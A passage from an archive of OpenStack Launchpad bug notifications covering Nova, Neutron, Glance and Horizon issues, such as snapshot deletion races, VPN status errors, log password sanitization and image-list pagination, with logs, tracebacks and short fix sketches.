  the given volume on the Nova side. As Cinder sees the volume is still
  'in_use' it calls the Nova API to perform the snapshot deletion, but
  since the volume has already been unmounted on the Nova side the
  resulting qemu-img operation triggered by Nova runs into a 'no such
  file or directory' error.

  The following log excerpts show this issue. Please refer to the given
  time stamps (all components run in a devstack in the same machine so
  times should be comparable):

  1) Cinder log (please note i added two debug lines printing the volume status 
data in this snippet that are not part of the upstream driver):
  2015-07-21 08:14:10.163 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Deleting snapshot 
ca09f072-c736-41ac-b6f3-7a137b0ee072: _delete_s
  napshot /opt/stack/cinder/cinder/volume/drivers/remotefs.py:915
  2015-07-21 08:14:10.164 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Initial snapshot deletion volume 
status is in-use _delete_snapsho
  t /opt/stack/cinder/cinder/volume/drivers/remotefs.py:918
  2015-07-21 08:14:10.420 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] snapshot_file for this snap is: 
volume-7f4a5711-9f2c-4aa7-a6af-c6
  ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072 _delete_snapshot 
/opt/stack/cinder/cinder/volume/drivers/remotefs.py:941
  2015-07-21 08:14:10.420 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Running cmd (subprocess): sudo 
cinder-rootwrap /etc/cinder/rootwra
  p.conf env LC_ALL=C qemu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072
 execute /usr/local/lib/python2.7/dis
  t-packages/oslo_concurrency/processutils.py:230
  2015-07-21 08:14:11.549 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] CMD "sudo cinder-rootwrap 
/etc/cinder/rootwrap.conf env LC_ALL=C q
  emu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072"
 returned: 0 in 1.129s execute /usr/local/lib/python2.7/d
  ist-packages/oslo_concurrency/processutils.py:260
  2015-07-21 08:14:11.700 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] In delete_snapshot, volume status is 
in-use _delete_snapshot /opt
  /stack/cinder/cinder/volume/drivers/remotefs.py:956

  2) Nova log:
  2015-07-21 08:14:05.153 INFO nova.compute.manager 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] [instance: adbe1fa4-7136-4d29-91d
  0-5772dbf4900d] Terminating instance  
  2015-07-21 08:14

[Yahoo-eng-team] [Bug 1487003] [NEW] [VPNaaS] IPSec connection is stuck in 'Active' state even if connection isn't established

2015-08-20 Thread Elena Ezhova
Public bug reported:

VPN connection is stuck in 'Active' state even if connection is broken.

Steps to reproduce:
- create two networks with subnets, and two routers
- add gateways to the public subnet for both routers and add interfaces for the 
newly created nets (subnet1 for router1 and  subnet2 for router2)
- create VPN connections between the two networks
- spawn 2 vms, check that vpn connection works correctly
- remove 1 vpn connection

Expected result:
The second connection is in 'Down' state

Actual result:
The second connection is still 'Active', though it's incorrect

** Affects: neutron
 Importance: Undecided
 Assignee: Elena Ezhova (eezhova)
 Status: New


** Tags: vpnaas

** Changed in: neutron
 Assignee: (unassigned) => Elena Ezhova (eezhova)

** Tags added: vpnaas

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487003

Title:
  [VPNaaS] IPSec connection is stuck in 'Active' state even if
  connection isn't established

Status in neutron:
  New

Bug description:
  VPN connection is stuck in 'Active' state even if connection is
  broken.

  Steps to reproduce:
  - create two networks with subnets, and two routers
  - add gateways to the public subnet for both routers and add interfaces for 
the newly created nets (subnet1 for router1 and  subnet2 for router2)
  - create VPN connections between the two networks
  - spawn 2 vms, check that vpn connection works correctly
  - remove 1 vpn connection

  Expected result:
  The second connection is in 'Down' state

  Actual result:
  The second connection is still 'Active', though it's incorrect

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487003/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487005] [NEW] unable to modify 'Allocation Pools' after creating a subnet

2015-08-20 Thread Aharon Rasouli
Public bug reported:

Modifying a subnet's 'Allocation Pools' is impossible after creation via
the Horizon GUI.

From the neutron CLI it works:
neutron subnet-update ce373461-08a4-4974-95d0-75ebf328a62f --allocation-pool 
'start=192.168.1.10,end=192.168.1.254'


1. Create a network
2. Create a subnet
3. Check the "disable gateway" option
4. Edit the subnet: Project --> newly created network --> click "Edit Subnet" 
on the relevant subnet
5. Change the 'Allocation Pools' so the range is 192.168.1.2-192.168.1.254
6. Click save
7. The save message reports success, but in fact nothing has changed; the 
allocation pools did not change

** Affects: horizon
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487005

Title:
  unable to modify 'Allocation Pools' after creating a subnet

Status in OpenStack Dashboard (Horizon):
  New

Bug description:
  Modifying a subnet's 'Allocation Pools' is impossible after creation
  via the Horizon GUI.

  From the neutron CLI it works:
  neutron subnet-update ce373461-08a4-4974-95d0-75ebf328a62f --allocation-pool 
'start=192.168.1.10,end=192.168.1.254'


  1. Create a network
  2. Create a subnet
  3. Check the "disable gateway" option
  4. Edit the subnet: Project --> newly created network --> click "Edit Subnet" 
on the relevant subnet
  5. Change the 'Allocation Pools' so the range is 192.168.1.2-192.168.1.254
  6. Click save
  7. The save message reports success, but in fact nothing has changed; the 
allocation pools did not change

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487005/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487025] [NEW] network-changed external_instance_event fails and traces hard if InstanceInfoCacheNotFound

2015-08-20 Thread Matt Riedemann
Public bug reported:

I saw this in a failed jenkins run with neutron:

http://logs.openstack.org/82/200382/6/check/gate-tempest-dsvm-neutron-
full/cd9bfaa/logs/screen-n-cpu.txt.gz?level=TRACE#_2015-08-20_12_36_06_873

2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher Traceback 
(most recent call last):
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
142, in _dispatch_and_reply
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
executor_callback))
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
186, in _dispatch
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
executor_callback)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
129, in _do_dispatch
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher result = 
func(ctxt, **new_args)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/exception.py", line 89, in wrapped
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher payload)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/exception.py", line 72, in wrapped
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher return 
f(self, context, *args, **kw)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/compute/manager.py", line 6310, in 
external_instance_event
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
self.network_api.get_instance_nw_info(context, instance)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/network/base_api.py", line 244, in 
get_instance_nw_info
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher result = 
self._get_instance_nw_info(context, instance, **kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/network/neutronv2/api.py", line 873, in 
_get_instance_nw_info
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
compute_utils.refresh_info_cache_for_instance(context, instance)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/compute/utils.py", line 356, in 
refresh_info_cache_for_instance
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
instance.info_cache.refresh()
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_versionedobjects/base.py", line 
195, in wrapper
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher ctxt, 
self, fn.__name__, args, kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/opt/stack/new/nova/nova/conductor/rpcapi.py", line 248, in object_action
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
objmethod=objmethod, args=args, kwargs=kwargs)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/client.py", line 
158, in call
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
retry=self.retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/transport.py", line 90, 
in _send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
timeout=timeout, retry=retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py", 
line 431, in send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
retry=retry)
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py", 
line 422, in _send
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher raise 
result
2015-08-20 12:36:06.873 9235 ERROR oslo_messaging.rpc.dispatcher 
InstanceInfoCacheNotFound_Remote: Info cache for instance 
d9b950aa-be7c-40bd-93b4-d4d575ebdace could not be found.

Basically, the instance is deleted before the event is processed:

http://logs.openstack.org/82/200382/6/check/gate-tempest-dsvm-neutron-
full/cd9bfaa/logs/screen-n-cpu.txt.gz#_2015-08-20_12_36_06_097

http://logs.openstack.org/82/200382/6/check/gate-tem
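
One way to tolerate this race is to treat a missing info cache as "the
instance is already gone" when refreshing network info for an external
event; a hypothetical sketch, not the actual fix:

from oslo_log import log as logging

from nova import exception

LOG = logging.getLogger(__name__)

def refresh_nw_info_tolerantly(network_api, context, instance):
    try:
        return network_api.get_instance_nw_info(context, instance)
    except exception.InstanceInfoCacheNotFound:
        # The instance (and its info cache) was deleted while the
        # network-changed event was in flight; skip instead of tracing.
        LOG.debug('Info cache for instance %s is gone; assuming the '
                  'instance was deleted.', instance.uuid)
        return None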

[Yahoo-eng-team] [Bug 1487026] [NEW] When tasks fail importing with an error

2015-08-20 Thread Niall Bunting
Public bug reported:

If a task fails while importing an image for whatever reason, such as a
404, it leaves the task in a 500 internal error state and the image in
a 'saving' state.

This should be changed so the image is killed and a reasonable message
is reported on the task failure screen.
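
A hypothetical shape of the desired behaviour (the task.succeed/fail
calls follow Glance's domain model, but the download callable and the
status handling are purely illustrative, not the actual task flow):

def import_image(task, image, download):
    try:
        download(image)  # may raise, e.g. on a 404 from the source URL
        task.succeed(result={'image_id': image.image_id})
    except Exception as exc:
        image.status = 'killed'  # don't leave the image stuck in 'saving'
        task.fail(message='Image import failed: %s' % exc)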

** Affects: glance
 Importance: Undecided
 Assignee: Niall Bunting (niall-bunting)
 Status: New

** Changed in: glance
 Assignee: (unassigned) => Niall Bunting (niall-bunting)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1487026

Title:
  When tasks fail importing with an error

Status in Glance:
  New

Bug description:
  If a task fails while importing an image for whatever reason, such
  as a 404, it leaves the task in a 500 internal error state and the
  image in a 'saving' state.

  This should be changed so the image is killed and a reasonable
  message is reported on the task failure screen.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1487026/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487038] [NEW] nova.exception._cleanse_dict should use oslo_utils.strutils._SANITIZE_KEYS

2015-08-20 Thread Matt Riedemann
Public bug reported:

The wrap_exception decorator in nova.exception uses the _cleanse_dict
helper method to remove any keys from the args/kwargs list of the method
that was called, but only checks those keys of the form *_pass:

http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

def _cleanse_dict(original):
"""Strip all admin_password, new_pass, rescue_pass keys from a dict."""
return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

The oslo_utils.strutils module has its own list of keys to sanitize,
used in its mask_password method:

http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

_SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
  'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
  'sys_pswd']

The nova code should probably be using some form of the same thing that
strutils is using for mask_password, which uses a regex to find hits.
For example, if the arg was 'auth_token' or simply 'password',
_cleanse_dict would fail to filter it out.
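
A minimal illustration (not the actual Nova patch) of how
oslo_utils.strutils.mask_password already catches keys that
_cleanse_dict misses:

from oslo_utils import strutils

payload = "rescue(password='hunter2', auth_token='SECRET', new_pass='x')"
print(strutils.mask_password(payload))
# The password, auth_token and new_pass values are all replaced with '***'.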

You could also argue that the oslo.messaging log notifier should be
using oslo_utils.strutils.mask_password before it logs the message -
which isn't happening in that library today.

** Affects: nova
 Importance: Low
 Status: Confirmed

** Changed in: nova
   Status: New => Confirmed

** Changed in: nova
   Importance: Undecided => Low

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487038

Title:
  nova.exception._cleanse_dict should use
  oslo_utils.strutils._SANITIZE_KEYS

Status in OpenStack Compute (nova):
  Confirmed

Bug description:
  The wrap_exception decorator in nova.exception uses the _cleanse_dict
  helper method to remove any keys from the args/kwargs list of the
  method that was called, but only checks those keys of the form *_pass:

  
http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

  def _cleanse_dict(original):
  """Strip all admin_password, new_pass, rescue_pass keys from a dict."""
  return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

  The oslo_utils.strutils module has its own list of keys to sanitize,
  used in its mask_password method:

  
http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

  _SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
'sys_pswd']

  The nova code should probably be using some form of the same thing
  that strutils is using for mask_password, which uses a regex to find
  hits.  For example, if the arg was 'auth_token' or simply 'password',
  _cleanse_dict would fail to filter it out.

  You could also argue that the oslo.messaging log notifier should be
  using oslo_utils.strutils.mask_password before it logs the message -
  which isn't happening in that library today.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487038/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1427098] Re: Container servers are wrongly scheduled to non-docker hypervisor

2015-08-20 Thread John Garbutt
docker is not in the nova tree any more, so this is no longer in scope
for nova.

** Changed in: nova
   Status: New => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1427098

Title:
  Container servers are wrongly scheduled to non-docker hypervisor

Status in OpenStack Compute (nova):
  Won't Fix

Bug description:
  In an environment with more than one hypervisor type including QEMU and
  docker, when creating a container server, the request can be wrongly
  scheduled to a QEMU hypervisor.

  I tested it in Juno and the same bug exists in Kilo.

  For example, there are two compute nodes: one hypervisor is docker
  (node A-172), the other hypervisor is QEMU (node B-168).

  I can create a docker server which uses the docker image
  "tutum/wordpress" on a QEMU node (node B-168). In this case it
  ignores whether the "image" parameter matches the hypervisor type,
  and the server finally fails to boot with "no bootable device".

  I'm not sure whether there are any other parameters that the QEMU,
  docker and Xen hypervisors should check.

  My steps are the following:

  [root@ ~(keystone_admin)]# glance image-show tutum/wordpress
  +------------------+--------------------------------------+
  | Property         | Value                                |
  +------------------+--------------------------------------+
  | checksum         | bab44a59a74878dd953c4ae5242f7c7c     |
  | container_format | docker                               |
  | created_at       | 2015-02-02T07:00:47                  |
  | deleted          | False                                |
  | disk_format      | raw                                  |
  | id               | b8e12702-3fd1-4847-b018-ac8ba6edead7 |
  | is_public        | True                                 |
  | min_disk         | 0                                    |
  | min_ram          | 0                                    |
  | name             | tutum/wordpress                      |
  | owner            | 09291698b9ff44728493252e67fc6ee5     |
  | protected        | False                                |
  | size             | 517639680                            |
  | status           | active                               |
  | updated_at       | 2015-02-02T07:02:15                  |
  +------------------+--------------------------------------+

  [root@ ~(keystone_admin)]# nova boot --flavor 2 --image
  tutum/wordpress --key-name key1 --nic net-
  id=2510a249-1665-4184-afc8-62a2eccf6c3b --availability-zone xxx:B-168
  test-image-168

  2015-03-02 01:55:12.239 2857 WARNING nova.virt.disk.vfs.guestfs [-] Failed to 
close augeas aug_close: do_aug_close: y
  ou must call 'aug-init' first to initialize Augeas
  2015-03-02 01:55:12.274 2857 DEBUG nova.virt.disk.api [-] Unable to mount 
image /var/lib/nova/instances/e799cc70-2e9f
  -44da-9ebd-0f55ddc7cd13/disk with error Error mounting 
/var/lib/nova/instances/e799cc70-2e9f-44da-9ebd-0f55ddc7cd13/d
  isk with libguestfs (mount_options: /dev/sda on / (options: ''): mount: 
/dev/sda is write-protected, mounting read-on
  ly
  mount: unknown filesystem type '(null)'). Cannot resize. 
is_image_partitionless /usr/lib/python2.7/site-packages/nova
  /virt/disk/api.py:218

  2015-03-02 01:55:12.276 2857 DEBUG nova.virt.libvirt.driver [-] [instance: 
e799cc70-2e9f-44da-9ebd-0f55ddc7cd13] Star
  t _get_guest_xml network_info=[VIF({'profile': {}, 'ovs_interfaceid': 
u'563e9d58-9d41-4700-b4f2-a56a6ecfcefe', 'netwo
  rk': Network({'bridge': 'br-int', 'subnets': [Subnet({'ips': 
[FixedIP({'meta': {}, 'version': 4, 'type': 'fixed', 'fl
  oating_ips': [], 'address': u'10.0.0.45'})], 'version': 4, 'meta': 
{'dhcp_server': u'10.0.0.3'}, 'dns': [], 'routes':
   [], 'cidr': u'10.0.0.0/24', 'gateway': IP({'meta': {}, 'version': 4, 'type': 
'gateway', 'address': u'10.0.0.1'})})],
   'meta': {'injected': False, 'tenant_id': 
u'3cf2410b5f554653a93796982657984b'}, 'id': u'2510a249-1665-4184-afc8-62a2e
  ccf6c3b', 'label': u'private'}), 'devname': u'tap563e9d58-9d', 'vnic_type': 
u'normal', 'qbh_params': None, 'meta': {}
  , 'details': {u'port_filter': True, u'ovs_hybrid_plug': True}, 'address': 
u'fa:16:3e:d9:b3:1f', 'active': False, 'typ
  e': u'ovs', 'id': u'563e9d58-9d41-4700-b4f2-a56a6ecfcefe', 'qbg_params': 
None})] disk_info={'disk_bus': 'virtio', 'cd
  rom_bus': 'ide', 'mapping': {'disk': {'bus': 'virtio', 'boot_index': '1', 
'type': 'disk', 'dev': u'vda'}, 'root': {'b
  us': 'virtio', 'boot_index': '1', 'type': 'disk', 'dev': u'vda'}}} 
image_meta={u'status': u'active', u'deleted': Fals
  e, u'container_format': u'docker', u'min_ram': 0, u'updated_at': 
u'2015-02-02T07:02:15.00', u'min_disk': 0, u'own
  er': u'09291698b9ff44728493252e67fc6ee5', u'is_public': True, u'deleted_at': 
None, u'properties': {}, u'size': 517639
  680, u'name': u'tutum/wordpress', u'checksum': 
u'bab44a59a74878dd953c4ae5242f7c7c', u'created_at': u'201

[Yahoo-eng-team] [Bug 1487048] [NEW] logic error in metadata_to_dict utility function

2015-08-20 Thread Brian Rosmaita
Public bug reported:

Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
filter_deleted flag into the metadata_to_dict function.  The way this
flag is used at
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
however, has the effect that when filter_deleted is true, all instance
system metadata will be returned in the dict even if such metadata is
deleted, contrary to the purpose of the flag.
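
A sketch of the presumably intended semantics (assuming, as described
above, that the flag is meant to drop deleted entries when set; this is
not the merged fix):

def metadata_to_dict(metadata, filter_deleted=False):
    result = {}
    for item in metadata:
        if filter_deleted and item.get('deleted'):
            continue
        result[item['key']] = item['value']
    return result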

** Affects: nova
 Importance: Undecided
 Assignee: Brian Rosmaita (brian-rosmaita)
 Status: New

** Changed in: nova
 Assignee: (unassigned) => Brian Rosmaita (brian-rosmaita)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487048

Title:
  logic error in metadata_to_dict utility function

Status in OpenStack Compute (nova):
  New

Bug description:
  Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
  filter_deleted flag into the metadata_to_dict function.  The way this
  flag is used at
  
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
  however, has the effect that when filter_deleted is true, all instance
  system metadata will be returned in the dict even if such metadata is
  deleted, contrary to the purpose of the flag.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487048/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487053] [NEW] validate_local_ip shouldn't run if no tunneling is enabled

2015-08-20 Thread John Schwarz
Public bug reported:

In case no tunnel_types were specified in the ml2 configuration, the
configuration option local_ip is ignored in the code. However,
validate_local_ip always checks whether local_ip is being used by an
actual interface, even though it shouldn't if tunnel_types is empty.
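
A guard of roughly this shape would skip the check when tunneling is
disabled (passing tunnel_types as a parameter is an assumption for
illustration, not the actual patch):

from oslo_log import log as logging

from neutron.agent.linux import ip_lib

LOG = logging.getLogger(__name__)

def validate_local_ip(local_ip, tunnel_types):
    if not tunnel_types:
        # local_ip is ignored elsewhere when no tunnel types are
        # configured, so there is nothing to validate.
        return
    if not ip_lib.IPWrapper().get_device_by_ip(local_ip):
        LOG.error("Tunneling cannot be enabled without a device holding "
                  "the local_ip %s.", local_ip)
        raise SystemExit(1)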

** Affects: neutron
 Importance: Undecided
 Assignee: John Schwarz (jschwarz)
 Status: In Progress

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487053

Title:
  validate_local_ip shouldn't run if no tunneling is enabled

Status in neutron:
  In Progress

Bug description:
  In case no tunnel_types were specified in the ml2 configuration, the
  configuration option local_ip is ignored in the code. However,
  validate_local_ip always checks whether local_ip is being used by an
  actual interface, even though it shouldn't if tunnel_types is empty.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487053/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487070] [NEW] Only CPU compute monitors are loaded by compute.monitors extension loader

2015-08-20 Thread Jay Pipes
Public bug reported:

There is a TODO in the extension loader for compute monitors:

# TODO(jaypipes): Right now, we only have CPU monitors, so we don't
# need to check if the plugin is a CPU monitor or not. Once non-CPU
# monitors are added, change this to check either the base class or
# the set of metric names returned to ensure only a single CPU
# monitor is loaded at any one time.

We need a mechanism to load other types of compute monitors than CPU.

** Affects: nova
 Importance: Low
 Assignee: Jay Pipes (jaypipes)
 Status: In Progress


** Tags: low-hanging-fruit

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487070

Title:
  Only CPU compute monitors are loaded by compute.monitors extension
  loader

Status in OpenStack Compute (nova):
  In Progress

Bug description:
  There is a TODO in the extension loader for compute monitors:

  # TODO(jaypipes): Right now, we only have CPU monitors, so we don't
  # need to check if the plugin is a CPU monitor or not. Once non-CPU
  # monitors are added, change this to check either the base class or
  # the set of metric names returned to ensure only a single CPU
  # monitor is loaded at any one time.

  We need a mechanism to load other types of compute monitors than CPU.
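
  One possible shape for such a mechanism, sketched only (the
  get_metric_names() interface is an assumption, not the actual plugin API):

      # Group loaded monitor plugins by the metrics they report and keep a
      # single monitor per group, so e.g. only one CPU monitor is active.
      def pick_monitors(plugins):
          chosen = {}
          for plugin in plugins:
              group = frozenset(plugin.get_metric_names())
              if group not in chosen:
                  chosen[group] = plugin
          return list(chosen.values())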

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487070/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487086] [NEW] Pagination doesn't work with v2 API image-list

2015-08-20 Thread Kairat Kushaev
Public bug reported:

It seems that the glance client doesn't implement pagination for image-list
correctly:
1) glance client v2 doesn't have the marker parameter defined
2) glance client ignores the page-size parameter when listing images:
glance image-list --page-size 1 returns all images.

** Affects: glance
 Importance: Undecided
 Assignee: Kairat Kushaev (kkushaev)
 Status: New

** Changed in: glance
 Assignee: (unassigned) => Kairat Kushaev (kkushaev)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1487086

Title:
  Pagination doesn't work with v2 API image-list

Status in Glance:
  New

Bug description:
  It seems that the glance client doesn't implement pagination for image-list
  correctly:
  1) glance client v2 doesn't have the marker parameter defined
  2) glance client ignores the page-size parameter when listing images:
  glance image-list --page-size 1 returns all images.
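
  For reference, a minimal sketch of the pagination contract the v2 image
  API itself exposes (plain HTTP via the requests library, not the glance
  client; endpoint and token are placeholders):

      import requests

      def list_images(endpoint, token, page_size):
          # the v2 API accepts 'limit' and 'marker' query parameters and
          # returns a 'next' link while more results are available
          url = endpoint + '/v2/images?limit=%d' % page_size
          while url:
              body = requests.get(url, headers={'X-Auth-Token': token}).json()
              for image in body['images']:
                  yield image
              url = endpoint + body['next'] if 'next' in body else None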

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1487086/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1352510] Re: Delete and re-add of same node to compute_nodes table is broken

2015-08-20 Thread Jim Rollenhagen
15:15:57 edleafe | jroll: ok, got to look at that bug, and yeah,
it should have closed it, but I forgot to put Closes-bug: in the commit
message

And I agree it appears to fix it.

This was released with Liberty-1

** Changed in: nova
   Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1352510

Title:
  Delete and re-add of same node to compute_nodes table is broken

Status in OpenStack Compute (nova):
  Fix Released

Bug description:
  When a compute node is deleted (or marked deleted) in the DB and
  another compute node is re-added with the same name, things break.

